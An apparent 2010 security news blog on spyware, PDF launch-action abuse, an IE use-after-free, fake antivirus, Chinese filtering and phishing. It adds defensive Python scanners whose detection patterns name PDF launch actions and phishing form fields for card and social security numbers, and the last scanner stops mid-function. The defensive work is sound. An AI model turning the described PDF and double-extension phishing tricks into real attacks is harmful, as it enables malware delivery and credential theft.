Spyware/DDoS malware combo
Google’s security team member Neel Mehta has blogged about yet another spyware attack on Google users from Asia. This time forces in Vietnam apparently are trying to spy on and stifle dissent from those opposed to the expansion of bauxite mining in the country’s central highlands. The dissenters object to the environmental impact, the Chinese involvement in the venture and the displacement of people who live in the mining area. Bauxite is the ore from which aluminum is extracted.
Chinese attempts to spy on dissidents’ Gmail accounts made headlines in January. At that time, Google said it would pull its operations out of China because of a wave of hack attacks from China on it and more than 30 other companies, mostly in Silicon Valley. The attacks were largely based on spear phishing and exploited an Adobe .pdf vulnerability to plant Trojans. An investigation by Google showed that the attackers were trying to download information from the Gmail accounts of Chinese dissidents and steal source code.
The malcode that Google just found infects Vietnamese language keyboard software that has been downloaded worldwide. Mehta says the spyware also is capable of participating in distributed denial of service attacks against bloggers opposed to the mining.
Mehta advised those who think they may be infected to run scans on their machines, since leading AV vendors now detect the malcode.
“New technology like our suspicious account activity alerts in Gmail should also help detect surveillance efforts. At a larger scale, we feel the international community needs to take cybersecurity seriously to help keep free opinion flowing,” he said.
Google Security Blog here.
Wednesday, March 31, 2010
Apple issues mega patch for Mac OS X
Apple has issued Security Update 2010-002 (Mac OS X v10.6.3) that fixes 100 enumerated vulnerabilities in:
-- Mac OS X 10.5
-- Mac OS X 10.6
-- Mac OS X Server 10.5
-- Mac OS X Server 10.6
The 400 MB+ download takes a while, so be prepared.
Info here: http://support.apple.com/kb/HT4077
Forbes: "It's all just Malware now"
It seems I prompted an exploration of infection-related search terms in Google Trends over on the Forbes.com Firewall blog. “Malware” is becoming a sort of catch-all term for end-users, slowly replacing the various Ad/Mal/Spyware classifications.
Article here – worth checking out the comment by Andy Hayter, Anti-Malcode Program Manager of ICSA Labs, too. Of course, I like to think I might have contributed in some small way to certain search terms going the way of the dinosaur...
Running executables in PDF: it’s a feature
Didier Stevens, security professional and blogger, has found a “feature” in the PDF file format that makes it possible to package an executable in a PDF file that will run in Foxit Reader and, with a bit of social engineering, in Adobe Reader.
“With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs).”
“…preventing Adobe Reader from creating new processes blocks this trick,” he said.
“In this case, Foxit Reader is probably worse than Adobe Reader, because no warning gets displayed to prevent the launch action. My PoC PDF requires some changes for Foxit Reader, because ultimately, the executable doesn’t run. But that’s probably due to some variation in the PDF language supported by Foxit Reader.”
Stevens has made available a proof-of-concept sample and said he notified Adobe’s product security incident response team.
Until this is solved, it would be a good idea to READ any notification that pops up when you open a PDF file, and DO NOT let yourself be socially engineered into disregarding warnings about launching executables.
Stevens' blog piece here.
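A defender-side complement to the advice above, added here as an example and not taken from Stevens's post or his PoC: a small scanner that flags the PDF mechanisms his trick relies on (a Launch action, an embedded file, JavaScript, and the open-time triggers that fire them), normalising the `#XX` name escapes that would otherwise hide `/Launch`, and inflating FlateDecode streams so names inside compressed objects are seen too. The three sample inputs are constructed fragments, not real documents, and `PLACEHOLDER.exe` is a made-up name.

```python
import re
import zlib

# PDF name objects may spell letters as #XX hex escapes, so /L#61unch is the
# same name as /Launch. Names are normalised before matching so that spelling
# does not hide an action from the scanner.
NAME_RE = re.compile(rb"/([A-Za-z0-9#._-]+)")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)

# Names that mark the mechanisms discussed in the post: a Launch action, an
# embedded file carrying a payload, JavaScript, and the triggers that run an
# action without any click.
RISKY_NAMES = {
    "Launch": "Launch action: asks the reader to start an external program",
    "EmbeddedFile": "file embedded inside the PDF",
    "JavaScript": "JavaScript action",
    "JS": "JavaScript code",
    "OpenAction": "action triggered when the document is opened",
    "AA": "additional actions (page or annotation triggers)",
}


def decode_name(raw: bytes) -> str:
    """Resolve #XX escapes in a PDF name token."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def inflate_streams(data: bytes) -> bytes:
    """Return the inflated contents of every Flate-compressed stream so that
    names hidden inside compressed objects are scanned as well."""
    inflated = []
    for m in STREAM_RE.finditer(data):
        try:
            inflated.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-compressed or damaged; the raw bytes are scanned anyway
    return b"\n".join(inflated)


def scan_pdf(data: bytes) -> dict:
    """Count each risky name seen in the raw bytes and in inflated streams."""
    counts = {}
    for blob in (data, inflate_streams(data)):
        for m in NAME_RE.finditer(blob):
            name = decode_name(m.group(1))
            if name in RISKY_NAMES:
                counts[name] = counts.get(name, 0) + 1
    return counts


def verdict(counts: dict) -> str:
    """Rank the findings; a Launch action is the case this post is about."""
    if "Launch" in counts:
        return "launch-action"
    if "EmbeddedFile" in counts:
        return "embedded-file"
    if "JavaScript" in counts or "JS" in counts:
        return "javascript"
    return "clean"


# Constructed test inputs: object fragments, not complete PDFs.
SAMPLE_LAUNCH = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Action /S /L#61unch /F (PLACEHOLDER.exe) >> endobj\n"
    b"%%EOF\n"
)
SAMPLE_CLEAN = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"
_js_body = zlib.compress(b"<< /S /JavaScript /JS (app.alert('constructed sample')) >>")
SAMPLE_FLATE = (
    b"%PDF-1.4\n3 0 obj << /Length " + str(len(_js_body)).encode()
    + b" /Filter /FlateDecode >>\nstream\n" + _js_body
    + b"\nendstream\nendobj\n%%EOF\n"
)

if __name__ == "__main__":
    for label, sample in (("launch", SAMPLE_LAUNCH), ("clean", SAMPLE_CLEAN),
                          ("flate", SAMPLE_FLATE)):
        found = scan_pdf(sample)
        print(f"{label}: {verdict(found)} {found}")
```

Run it against a directory of downloaded PDFs by reading each file's bytes into `scan_pdf`; a `launch-action` verdict on a document that merely claims to be an invoice or report is the case to quarantine and inspect, since a legitimate document has no reason to ask the reader to start another program.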
MS out-of-band patch TODAY
MS10-018
If you’re using Internet Explorer version 6 or 7 it wouldn’t be a good idea to miss this one. “Actively exploited” for drive-by downloads from malicious web sites sums it up.
There’s something in it for IE8 as well.
See our post yesterday: “Microsoft out-of-band patch tomorrow”
iTunes 9.1 Released: iPad Syncing and iBooks Support Included
Let the iPad hype and excitement begin: Apple’s preparation for the launch of the iPad has kicked into high gear. Today, the tech giant released version 9.1 of iTunes, its vastly popular music, app, and now book-managing software.
The new update doesn’t do anything like radically change the iTunes interface. Instead, it is focused on providing support for the iPad, which launches this Saturday. The big addition in this software update is iPad syncing. Thus if and when you plug that glorious iPad of yours into your computer on Saturday, it’ll sync your computer’s music, movies, books, and other media with your tablet device.
There are a few other additions to iTunes worth noting. Support for iBooks has been included in this software update, providing you the ability to sync books you’ve bought between your iPad and your computer. Finally, there have been some changes to the Genius feature — now you can rename, rearrange, and remove mixes you create via the Genius feature.
In reality, today’s update is all about making sure that the iPad experience goes smoothly on Saturday. By releasing the software early, they can find and remove any final bugs before one of the most important product launches in the company’s history.
File Transfers Coming to Gmail Chat
Google has revealed that users can now transfer files via chat in iGoogle and Orkut.
This is good news for web users with a preference for software-free chatting, but the better news is that Google promises to bring the same functionality to Gmail, which already supports voice, video and group chat.
The iGoogle and Orkut file transfers will work for photos, documents and presumably small video files. In addition, web users can exchange files with users of Google Talk — the more robust desktop version of Google’s chat client — without any hiccups.
We certainly look forward to the day when file transfers will be supported via chat in Gmail, and we’ll update you when we know more. Until then, let us know what you think about the new iGoogle and Orkut functionality in the comments.
Chrome 5 becomes the Flash browser, integrates plug-in with dev build
With Google owning YouTube, the Internet's principal delivery system for Flash-based video, it was perhaps inevitable that the company would bundle the Flash plug-in with its Chrome browser. The announcement came today from both Google and the team developing the open source Chromium component on which Chrome is based.
The move now officially places Google in contention with proponents of HTML 5, who had held out a glimmer of hope for a non-proprietary, non-plug-in video format for the standard's new [VIDEO] element. In its blog post today, the Chromium team indirectly blamed the standards process for not having solved what it perceives as the problem of specifying how plug-ins should operate, and credits Mozilla -- which makes Firefox -- with helping to rectify that issue.
"The traditional browser plug-in model has enabled tremendous innovation on the Web, but it also presents challenges for both plug-ins and browsers," reads today's post from Google Vice President for Engineering Linus Upson. "The browser plug-in interface is loosely specified, limited in capability and varies across browsers and operating systems. This can lead to incompatibilities, reduction in performance and some security headaches."
Upson credits Mozilla's efforts to upgrade and improve the old Netscape plug-in API model, still called NPAPI. This model currently enables out-of-process plug-ins to operate essentially independently from the browser. Historically, it's this independence that has been exploited by malicious users infiltrating victims' systems through Adobe Flash. Under the new system proposed by Mozilla, code-named "Pepper," processes launched through the browser would run through threads that are routed completely independently of browser and renderer threads. Specifically, the new thread model would block browser threads when plug-in threads are active, and vice versa, so that one would never have access to the other.
Consider it a kind of "anti-multithreading" that may very well be necessary in the age of Web applications.
But by citing Mozilla as the leader in this effort, Google may effectively be ceding responsibility for solving some of the most critical Flash security issues to date, to Mozilla. Until then, Upson concedes that the first Chrome dev build to contain the Flash plug-in will not yet have resolved a potential security risk: the separation between the Chrome tab processes and the Flash runtime. Part of Google's (originally) innovative security model was its division of browser tabs into separate processes, so that when one tab crashes, the main browser remains stable.
One of the unanticipated side-effects of this model deals with Chrome's approach to add-ons: They too are separate processes, all of which identify themselves to the operating system as Chrome. The screenshot above shows a list of active processes from Sysinternals' Process Explorer, with the latest Chrome dev build 360.4. There's only one tab running the Acrobat.com page, but note that Chrome appears twice in the list. That second instance appears to be the Chrome sandbox wrapped around the Flash add-on.
But it's not. As Google's Upson said today, despite appearances, the Flash instance which that second item appears to encapsulate is not completely covered by Chrome's sandbox -- its safe operating environment. There are obvious reasons for that: Here, Flash Web apps are hosted in the client by the AIR runtime. There should only be one instance of AIR running within a client.
The reasons why were outlined in a 2008 white paper (PDF available here) written by a trio of university researchers who were employed by Google to design Chromium. It's in "The Security Architecture of the Chromium Browser" that the designers explain the division of the browser kernel, which interacts with the operating system, from the renderer which is isolated in the sandbox. Plug-ins must run independently of the sandbox in order to fulfill the needs of their manufacturers, the group stated, even though doing so introduces a potential vulnerability. Notice which plug-in they picked as their case-in-point:
In Chromium's architecture, each plug-in runs in a separate host process, outside both the rendering engines and the browser kernel. In order to maintain compatibility with existing web sites, browser plug-ins cannot be hosted inside the rendering engine because plug-in vendors expect there to be at most one instance of a plug-in for the entire web browser. If plug-ins were hosted inside the browser kernel, a plug-in crash would be sufficient to crash the entire browser. By default, each plug-in runs outside of the sandbox and with the user's full privileges. This setting maintains compatibility with existing plug-ins and web sites because plug-ins can have arbitrary behavior. For example, the Flash Player plug-in can access the user's microphone and webcam, as well as write to the user's file system (to update itself and store Flash cookies). The limitation of this setting is that an attacker can exploit unpatched vulnerabilities in plug-ins to install malware on the user's machine.
Users could try running Chromium (and later Chrome), the group suggested, using the command line switch --safe-plugins, which would place all plug-ins under the protection of the renderer's sandbox. But they'll likely crash, they warned.
To address that problem, Adobe's senior director of Flash engineering, Paul Betlem, said in a blog post today that his team will work with both Google and Mozilla to replace and improve NPAPI. "While the current NPAPI has served the industry well, it lacks the flexibility and power to support the pace of innovation we see ahead," Betlem wrote. "We expect that the new API specification will offer some distinct benefits over the current technology available."
One foreseeable outcome of this collaboration could very well be a community where at least some plug-ins are compatible with both Chrome and Firefox simultaneously. But another outcome that Adobe's Betlem points to is a certain kind of unification, not just of the security model but of how the browser presents itself to the world. Think of it as "the Flash browser."
"The new API is being designed with the flexibility to allow plug-ins to more tightly integrate with host browsers," wrote Betlem. "The new plug-in API will provide performance benefits since the host browser will be able to directly share more information about its current state."
Reaction to Adobe's and Google's move today was mixed on Google's forums, with about two-thirds of respondents against the bundling and one-third vocally in favor. As supernova_00 wrote this morning, "Ugh. And here I thought we were all getting close(ish) to completely ditching Flash, and you guys decide to bundle Flash with Chrome. What the hell happened to open standards?"
Plus this from contributor Daniel Hansen: "Just when we thought that Google was the champion of HTML 5, they turn around and partner with Adobe on Flash to ensure that the Web remains a mess of proprietary brain damage."
Support for the move centered around the notion that Flash is simply a fact of life on the modern Web that no arbitrarily imposed standard is likely to change overnight, or even in the next decade. "People must be really dumb if they think HTML 5 is going to kill Flash," wrote Gabriel. "It's used for so-o-o much more than cats playing piano. The sooner you realize this, the more Google's move makes sense."
There was also this from contributor Troy: "How is Flash not an open standard? The bytecode format of [Shockwave] SWFs is published. There are open-source tools for producing SWFs. The tool chain is open-source and free. The player is available on the three major desktop OSs, and now on many mobile devices, as well as several video game consoles. Its virtual machine is open-sourced. Sure, it's not standard-certified by some international organization, but neither is HTML 5 (yet) nor is CSS3 (yet). It is a de facto standard, used by more Web sites and users than HTML 5, CSS3, Canvas, etc. Come on, folks, let's be pragmatic."
The bundling of Flash with Chrome does not change the relationship between the component and the browser, as indicated by the about:plugins page above. Notice its format changed with this latest dev build; it now includes (highly requested) Disable links that let you turn off plug-ins without uninstalling them. However, bundling Flash did add 2.4 MB to Chrome 5's download size, plus a single new question to the startup procedure (shown below). In the dev build, to start using the Flash plug-in that's distributed with the browser, you run Chrome from the command line, adding the switch --enable-internal-flash.
Tuesday, March 30, 2010
Australian Internet censorship row warms up
There seems to be an established procedure used by government officials who want to censor Internet traffic: begin by requiring Google and ISPs to filter pornography, then sneak in filtering of the politically sensitive material of your choice.
Maybe we should give this a name: how about “porn filter law bait and switch?”
In China’s Green Dam fiasco last summer, the web filter that was required on new machines (before the whole idea broke down) was supposed to protect good Chinese Internet users from sex and violence. When various researchers took apart the Green Dam files, however, they found that 1) it ripped off a lot of code from a U.S. company and 2) two thirds of the strings it was set up to filter were politically sensitive words and not sex and violence issues at all.
Australian Communications Minister Stephen Conroy is taking the same tack: He’s furious that Google is opposed to the Internet filtering scheme he’s proposing. It starts with sexually related web sites (which present photos of flat-chested women allegedly preferred by pedophiles), but his blacklist also includes material that would screen discussions of sexual health matters and EUTHANASIA. Conroy is a strong opponent of euthanasia.
Inquirer story here: “Australia attacks Google”
EXEs in word docs
Today, our friends at Trend Micro blogged about a new attack vector using Microsoft Word documents. We saw this as well last week, and have written a detection for the dropped trojan.
It’s not just a “lawsuit” that’s being spammed; we also picked up another form of this attack in our honeypots over the weekend:
When you open the Word document, you see a “PDF”, but it’s actually not. It’s a JPG, which links to an executable.
In Word 2007, it’s kind of like the Amish virus: The user has to really want to get infected.
Latest VirusTotal detection here.
File COMPLA_1.EXE received on 2010.03.29 23:00:50 (UTC)

| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| AntiVir | 7.10.5.248 | 2010.03.29 | TR/Dropper.Gen |
| Avast | 4.8.1351.0 | 2010.03.29 | Win32:Malware-gen |
| Avast5 | 5.0.332.0 | 2010.03.29 | Win32:Malware-gen |
| BitDefender | 7.2 | 2010.03.29 | Trojan.Downloader.JMZC |
| F-Secure | 9.0.15370.0 | 2010.03.30 | Trojan-Downloader:W32/Lapurd.E |
| GData | 19 | 2010.03.29 | Trojan.Downloader.JMZC |
| McAfee+Artemis | 5935 | 2010.03.29 | Artemis!60DF604563A1 |
| McAfee-GW-Edition | 6.8.5 | 2010.03.29 | Trojan.Dropper.Gen |
| Microsoft | 1.5605 | 2010.03.30 | Trojan:Win32/Meredrop |
| Prevx | 3.0 | 2010.03.30 | High Risk Fraudulent Security Program |
| Sophos | 4.52.0 | 2010.03.30 | Sus/UnkPack-C |
| Sunbelt | 6114 | 2010.03.30 | Trojan-Downloader |
| Symantec | 20091.2.0.41 | 2010.03.30 | Backdoor.Trojan |
Improved chat for iGoogle and orkut
Have you ever wanted to quickly send a file to a friend who's online? Now you can share pictures, documents and other files directly with your friends while chatting in iGoogle and orkut, without having to switch to email to send the file as an attachment. File transfer works directly in the browser so you don't need to install anything. Just start a conversation with a friend and click “Send a file...” in the “Actions” menu. After you select a file, your friend will be asked if they want to accept the transfer. You can learn more on the Google Talkabout Blog.
You might have noticed that Google recently gave iGoogle and orkut chat a face lift. Several tools now have a new home at the top of the chat window. From the new toolbar, you can click the blue camera and phone icons to start video and voice chats with your friends, or the group chat icon to add additional friends to a text chat. If you've never used video or voice chat before, all you need is a webcam and microphone attached to your computer and a small plugin application available for free at www.google.com/chat/video.
Google is working to bring file transfer and the new toolbar to Gmail too. In the meantime, you can continue to access voice, video and group chat in Gmail from the “Video and More” menu in a chat window.
Test of China Internet connections reveals heavy filtering
Using a Firefox 3.0 add-on created by developers in Hong Kong, Betanews was able to briefly establish a connection with the Internet via a proxy based in mainland China. With that proxy, we were able to confirm that searches performed using Google's Hong Kong-based page were effectively blocked.
Firefox 3.0 reported the blockage with this message: "The connection to the server was reset while the page was loading" -- a message from the browser, not from an ISP. We used version 3.0.16 of Firefox (an older edition) because it is the only version compatible with China Channel, a tool made for the express purpose of testing China's filtering ability. It has not been upgraded for version 3.6.
Further tests using the same proxy connection revealed that filtering may not be limited to Google. Searches for innocuous topics using Baidu, the country's leading search service known to employ its own filtering, were also blocked. We confirmed that the failed Baidu attempts were on account of blockage rather than just a dropped connection by browsing immediately to Xinhuanet, the country's state-run news service.
Our proxy connection lasted for approximately eight minutes before all requests began timing out. During that period, we saw some evidence that, rather than just blocking Google specifically, China ISPs may be using a much broader form of blocking of .com addresses in general, at least with the range of IP addresses under which our successful proxy connection falls.
For example, we could not connect to Baidu's home page using baidu.com. However, we were successful using baidu.cn, an address which, for clients outside China, is redirected to baidu.com anyway. Other .cn addresses were accessible, but betanews.com was not -- and I doubt we draw the attention of Chinese authorities enough to earn a spot on its blacklist.
The proxy IP address from which we were successfully able to establish the connection, should you wish to try this test for yourself, was: 218.14.227.197:3128, which traces to Beijing. Port 3128 is normally associated with proxy servers.
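The test above hinges on telling an injected "connection reset" apart from a connection that simply drops or never answers. The following is an added example, not Betanews' tooling and not the China Channel add-on: a small probe that sends a minimal HTTP request and classifies the outcome by the socket error it gets back. To keep it self-contained it talks only to loopback servers constructed here that mimic the three behaviours (a normal reply, a TCP RST, and a black hole); no proxy or remote site is contacted. A reset on its own is only consistent with filtering, which is why the article's cross-check, immediately fetching a site known to be reachable through the same path, still matters.

```python
import socket
import struct
import threading
import time


def probe(host, port, path="/", timeout=1.0):
    """Send a minimal HTTP/1.0 request and report how the attempt ended.

    Returns one of:
      "ok"       an HTTP response came back
      "reset"    the peer sent a TCP RST (what Firefox reports as
                 "the connection to the server was reset")
      "timeout"  nothing came back at all, i.e. a dropped connection
      "closed"   the peer closed cleanly without replying
      "refused"  nothing was listening on the port
    """
    request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            data = s.recv(4096)
    except (ConnectionResetError, BrokenPipeError):
        return "reset"
    except socket.timeout:
        return "timeout"
    except ConnectionRefusedError:
        return "refused"
    return "ok" if data else "closed"


def _serve_once(behaviour):
    """Start a loopback server (constructed for this demo) that handles one
    connection with the given behaviour and return the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        conn.settimeout(5)
        try:
            conn.recv(4096)  # wait for the client's request first
            if behaviour == "ok":
                conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nhi")
            elif behaviour == "reset":
                # SO_LINGER with a zero timeout makes close() emit RST instead
                # of FIN, which is what an injected reset looks like to the client.
                conn.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
                                struct.pack("ii", 1, 0))
            elif behaviour == "blackhole":
                time.sleep(2)  # never answer; the client times out first
        finally:
            conn.close()
            srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def run_demo():
    """Probe one server of each kind and return {behaviour: outcome}."""
    results = {}
    for behaviour in ("ok", "reset", "blackhole"):
        port = _serve_once(behaviour)
        results[behaviour] = probe("127.0.0.1", port)
    return results


if __name__ == "__main__":
    for behaviour, outcome in run_demo().items():
        print(f"{behaviour:10s} -> {outcome}")
```

In a real measurement the same `probe` call would be pointed at the hostnames under test, once per path (direct, and via whatever vantage point is being compared), and the outcomes tabulated per domain so that a pattern such as ".com reset, .cn ok" stands out from random packet loss, which shows up as "timeout".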
Back to Basics with Fake AV
We’ve been seeing Fake AV programs getting more convincing for a while now. Some of the tricks employed by the guys behind these rogue programs include Windows-7-style fake scanners, in-browser “scanners”, and program features that ape other aspects of the operating system.
Yesterday, though, we came across a misleading application called AntiVirusDemoFraud that is—how to say?—possibly a little less sophisticated than some in terms of user interface design.
Obvious in the screenshots are the familiar misleading application hallmarks, such as fake detection names, dire warnings as to what the “threats” are capable of, and buttons to pay to register the program and remove the threats. Notable are the errors in spelling and grammar, the “dotted tri” IP address, and the frankly amateurish interface. Don’t give up your day jobs folks.
Facebook AV
Does a Facebook-specific antivirus application sound like a good idea? Maybe not. One of our analysts saw this particular application claiming to be an antivirus wreak havoc on his Friends list. Of course, there is no such thing.
Once installed on one Friend's account, this application tags 20 Friends in a picture such as the one below:
If a Friend looking through the photos then clicks on the app's (apparently randomly generated) link, they'll see this:
If you have a lot of friends, you might end up with a series of albums like this:
You can find more information about this, including instructions on how to remove the tags on the photos, at FacebookInsider.
Examples include Antivirus in Focebook and F'acebook antivirus.
Notice the misspelling of Facebook in both names. Facebook is already in the process of removing and preventing such rogue apps.
Microsoft out-of-band patch tomorrow
Microsoft said today it will issue an out-of-band patch tomorrow for a vulnerability in Internet Explorer 6 and 7 that is being actively exploited.
“The vulnerability exists due to an invalid pointer reference being used within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution,” Microsoft said in its Security Advisory 981374 earlier this month.
“In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability,” they said.
The vulnerability is enumerated as CVE-2010-0806.
Advisory here.
MPEG LA wins major MPEG-2 settlement from Alcatel-Lucent
Could the manufacturers of DVD players (no, not just Blu-ray, but the original DVDs) owe back royalties to Alcatel-Lucent for the use of patented technology by way of the MPEG-2 codec? The MPEG Licensing Authority had asserted that Alcatel may have structured its 2006 merger with Lucent in such a way that it could hide up to five patents in a special trust, and spring their overdue royalties on the video industry long after DVDs already began the march to obsolescence.
That assertion was being made in a Delaware courtroom earlier this month, in a trial pertaining to a lawsuit filed by the MPEG Licensing Authority back in 2007. Today, MPEG LA -- which also collects royalties for the use of MPEG-2 -- announced a settlement in the case, essentially amounting to a complete defeat for Alcatel-Lucent.
The five patents that Alcatel-Lucent had maintained in what it called the Multimedia Patent Trust (MPT), will now be submitted to MPEG LA with the possibility of inclusion in the portfolio it already licenses to manufacturers -- and by "possibility," we mean, virtual certainty.
The settlement brings to a close a dispute which threatened to get ugly, over the intellectual property rights for a relatively old -- and many would argue, antiquated -- way of encoding video. The dispute began when Microsoft, along with computer makers Dell and Gateway (now part of Acer), were first sued by the newly merged entity on behalf of the former Lucent. Alcatel was (and still is) a member of MPEG LA itself, but Lucent was not. At the time, Alcatel-Lucent maintained it set up the trust in order to protect patents from Lucent's old Bell Laboratories portfolio, that it asserted had not been folded into the MPEG-2 Essential Patents portfolio of MPEG LA.
"The MPT was established at the time of the merger in 2006 because Lucent Technologies had certain patents at risk of losing value because of how the merger was structured," reads a statement from Alcatel-Lucent General Counsel Steve Reynolds ten days ago. "To preserve their value over the life of the patents, Lucent created the trust and assigned those patents to it. The trust now owns and controls those assets. Proceeds from the trust go to Alcatel-Lucent and the Alcatel-Lucent Foundation."
At the time the computer and software makers were sued, the total valuation of the suit was estimated at over $2 billion. But even the amount has been a matter of dispute, especially since a San Diego district court judge ruled in 2008 that the patents in this case were essentially...non-essential. That devalued them at the same time it appeared to indicate they did not belong in MPEG LA's "Essential Patents" portfolio.
Referring to a correction that Bloomberg News had to make in a report earlier this month, Alcatel-Lucent's Reynolds added, "Because the San Diego court determined that the patents were not infringed, and therefore were not essential, we do not see how MPEG LA could claim rights to these patents under any circumstances. Our understanding is that MPEG LA claims to have rights to essential patents. By court determination, the MPT patents in the San Diego lawsuit simply don't meet that requirement. That should have been the headline, not a sensational number about a bogus and non-existent risk."
Testimony in the trial was already drawing to a close. In a statement to Betanews this afternoon, MPEG LA said, "The resolution of the case is consistent with the relief MPEG LA sought in its complaint."
It's not dead yet: Microsoft's out-of-band IE6 fix impacts IE8
Last month, Microsoft sent flowers to a mock funeral for Internet Explorer 6, in a show of support for the ideal that the old browser should be declared defunct worldwide. But for a few years yet, the company is still bound to support the product for those users (generally businesses) who refuse to upgrade it. That's why new exploits that continue to target old browsers, such as IE6 and IE7, continue to get attention even a full year after the proper security fix -- IE8 -- has been deployed.
One of the libraries that, among other functions, helps IE to print is the target of an exploit released into the wild earlier this month. The exploit creatively overloads the system with JavaScript variables, then places function calls to IEPEERS.DLL. Once the library is effectively crashed, its used memory isn't cleaned up, enabling binary code seeded into that memory to be executed -- a classic use-after-free scenario.
Although various IE8 and Vista-era architectures protect Windows users from this scenario, Microsoft's security team said today it will take the unusual step of issuing an out-of-band update tomorrow, two weeks ahead of the usual Patch Tuesday. The update will also serve as a "cumulative roll-up," adding nine other fixes that had been planned for April 13.
Microsoft has said that Data Execution Prevention in IE8 is one of the effective workarounds for this exploit, at least until tomorrow. But the US Homeland Security Dept.'s US-CERT agency warns that DEP is only a partial fix, saying, "DEP should not be treated as a complete workaround, but DEP can mitigate the execution of attacker-supplied code in some cases." US-CERT suggests that users instead disable Active Scripting, one of the perennially sensitive elements of the old ActiveX system.
Friday, March 26, 2010
Fake Lawsuit Notification Attack
A few days ago, we encountered an e-mail with a malicious RTF attachment. It was sent with a supposed lawsuit notification message.
The e-mail didn't mention any company by name and took a shotgun, rather than targeted, approach.
Today, a security blogger forwarded us (and others) his version of the e-mail:
At this point, it appears that the attachment has been replaced by a hyperlink pointing to the Marcus Law Center.
It is difficult to determine whether or not the MLC site is compromised or just completely bogus. Their Our Firm page text borrows heavily from a New York lawyer's site, but that could just be a case of "honest" plagiarism.
In any case, our browsing protection feature is now blocking the sub-directory hosting the malicious file as unsafe.
The RTF file includes an embedded object that acts as a trojan dropper (Trojan-Dropper:W32/Agent.DIOY) and it drops a downloader (Trojan-Downloader:W32/Lapurd.D), which then attempts to connect to a server located in Southern China.
The earlier attachment that we saw also attempted to connect to a server in China.
SANS diary reports that a number of .edu sites have also received a similar message.
The domain, touchstoneadvisorsonline.com, is hosting the same RTF (.doc) file.
Child Tax Credit is the New Phishing Bait
Who wouldn’t want some tax benefits in the current economic times? Phishers and scammers know that all too well! In a new phishing scheme, we found that the Child Tax Credit is being used as bait to lure parents into disclosing their financial data. This attack specifically tries to convince users to make claims for credit and lower their tax burden by using their children’s education expenses.
According to the Internal Revenue Service (IRS) website [PDF], taxpayers may be able to reduce their federal income tax by up to $1,000 for each qualifying child. Making use of this information, spam email discusses the expensive education of children and quickly advises recipients to use this expense to make claims for tax credits under the numerous tax benefits provided by the IRS. They make a further appeal that as a U.S. citizen or resident, recipients should apply for their tax returns. According to the email, users can get a tax refund of $75,000 for their children’s education. To apply for a refund, users need to complete a form attached to the email message. The fraudulent email has an HTML attachment named “#1924819299.pdf.htm”.
Once the recipient clicks on the attachment, an HTML file will open that asks users to fill in data such as social security numbers, credit/debit card numbers, and related information. Unfortunately, this information is for the fraudsters to use once the user clicks the “submit” button.
Using an HTML attachment in phishing attacks is a well-known technique. There are constant variations seen in the headers and contents of these messages designed to confuse users. This time the scammers have found a new theme and a new potential target: parents. However, we are continually watching these types of attacks, particularly for any minor variations. This is more so because the deadline for filing individual tax returns (April 15, 2010) is not far away, and it won’t be surprising if there are similar spam campaigns seen during the next one to two weeks.
Scammers may further attempt to use the huge list of tax benefits as lures to trick users. We advise users to apply the standard practice of not opening attachments and/or links from unsolicited emails.
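Both this campaign and the fake lawsuit notification above rely on an attachment that is not what its name says: an HTML form hiding behind a ".pdf.htm" double extension, and an RTF file with an embedded object delivered under a ".doc" name. The following is an added example, not code from either post's authors, of the kind of triage a mail gateway or analyst script can run over an attachment before anyone opens it. The sample attachments are constructed for the demonstration (the form posts to the reserved domain example.invalid) and are not the real files from these campaigns.

```python
import re
from pathlib import PurePosixPath

HTML_EXTS = {".htm", ".html", ".xhtml", ".mht", ".mhtml"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
# Expected leading bytes for extensions worth sniffing (assumed, minimal table).
MAGIC = {".pdf": b"%PDF", ".rtf": b"{\\rtf"}

# <input name="..."> fields whose name suggests financial or identity data.
SENSITIVE_FIELDS = re.compile(
    rb'<input[^>]*\bname\s*=\s*["\']?([^"\'\s>]*(?:ssn|social|card|cvv|cvc|pin|'
    rb'password|routing|account)[^"\'\s>]*)',
    re.I,
)
EXTERNAL_FORM = re.compile(rb'<form[^>]*\baction\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)


def triage_attachment(filename, content):
    """Return a list of findings for one attachment; an empty list means nothing odd."""
    findings = []
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    final_ext = suffixes[-1] if suffixes else ""

    # 1. Double extension: a document-looking extension followed by an HTML one.
    #    The OS dispatches on the last extension, so "x.pdf.htm" opens in a browser.
    if len(suffixes) >= 2 and final_ext in HTML_EXTS and suffixes[-2] in DOCUMENT_EXTS:
        findings.append(f"double extension {suffixes[-2]}{final_ext}: opens as HTML, "
                        f"not as {suffixes[-2][1:].upper()}")

    # 2. Any HTML attachment deserves a look: the harvesting form runs from the
    #    local disk, so URL-reputation filters never see it.
    if final_ext in HTML_EXTS:
        findings.append("html attachment")
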